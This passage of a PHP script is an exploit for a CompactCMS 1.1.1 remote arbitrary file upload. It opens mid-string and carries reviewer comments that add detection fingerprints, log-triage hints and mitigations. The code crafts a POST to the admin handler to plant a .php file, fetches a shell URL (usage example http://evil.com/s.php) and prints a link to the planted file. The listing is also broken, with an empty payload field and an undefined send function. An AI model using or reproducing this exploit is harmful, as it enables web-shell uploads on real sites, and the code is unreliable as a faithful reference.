.\n\n";
    // NOTE(review): this copy opens part-way through a string literal. The statements down
    // to the closing brace look like the tail of the usage helper invoked as help() below,
    // but its header is outside the visible text.
    echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
    echo "[?] Usage: ".$argv[0]." .\n\n";
    echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
    die();
}

// Proof-of-concept for the issue named in the banner further down (CompactCMS v 1.1.1,
// "Remote Arbitrary File Upload"). Read defensively, the visible code documents:
//   - the request that matters: one POST to admin/handler.inc.php with a "file" query
//     parameter and "action" / "content" form fields;
//   - the artefact it expects afterwards: a .php file under content/ named after that
//     "file" parameter;
//   - the control that stops it: an HTTP authentication challenge on the admin path.

// No arguments: print usage and stop.
if ($argv[1] == "") {
    help();
    die();
}

// Positional arguments: target host, CMS base path, a URL that is fetched near the end of
// the script, and optional HTTP Basic credentials. $argv[4] and $argv[5] are read
// unconditionally, so they are unset when the five-argument form is not used.
$host = $argv[1];
$path = $argv[2];
$shell = $argv[3];
$login = $argv[4];
$pass = $argv[5];

// $tmpshell becomes the "file" query parameter and, with ".php" appended, the file name in
// the final message. $shellname is assigned but never read in the visible code.
$tmpshell = "1123";
$shellname = "manpage.php";

// Form body. It is appended with .= although $payload is not initialised anywhere in the
// visible code, and in this copy the "content" field holds nothing but two CRLF pairs.
// NOTE(review): the original value may have been lost when the page was extracted — confirm
// against the advisory before relying on this listing as a reference.
$payload .= "action=Save changes&content=\r\n\r\n";

echo(" ------------------------------------------------------------------ \tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit ------------------------------------------------------------------\n\n");
echo("**\t Coded by Dimi4, greetz Antichat\n\n");
echo ("[+] Connecting to {$host}...\n");

// Request construction. Traits that are written literally here and are therefore usable as
// detection fingerprints wherever full requests are captured (reverse proxy, WAF):
//   - an absolute-URI request line ("POST http://<host>/...") with HTTP/1.0;
//   - the path is built as "/{$path}/admin/...", so the example path "/ct/" from the usage
//     text yields doubled slashes around it;
//   - a header literally named "prama" (sent exactly as spelled);
//   - the fixed value 1123 in the "file" query parameter.
$packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
// Credentials are attached only when both were supplied; otherwise the request is sent
// without any Authorization header.
if(!empty($login) && !empty($pass)) {
    $packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;

// http_send() is not defined in the visible text; presumably it writes $packet to the host
// and returns the raw response — TODO confirm against the full listing.
$response = http_send($host, $packet);
//echo ($response);

// The only response check is for a WWW-Authenticate header: an authentication challenge on
// the admin path ends the run unless working credentials were passed in. That makes
// enforced authentication on admin/ the mitigation this script itself demonstrates.
// Blocking script execution under content/ is a reasonable second layer, given the .php
// URL printed below.
if (preg_match("/WWW-Authenticate/i", $response)) {
    die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
} else {
    echo ("[+] Sending Payload...\n");
    echo ("[+] Downloading shell...\n");
    // Fetches the URL from the third argument on the machine running the script. The result
    // is used only as a true/false check, and $warning is set only on failure, so it is
    // undefined when interpolated on the success path.
    if(!file_get_contents($shell)) {
        echo ("\t[!] Warning! Can't Download shell!\n");
        $warning = "Maybe";
    }
    // "Successful" is printed without ever requesting the content/ URL, so this output is
    // not proof that a file was written. For triage, look for unexpected .php files under
    // the CMS content/ directory and for POSTs to admin/handler.inc.php in access logs.
    echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
    die();
}
?>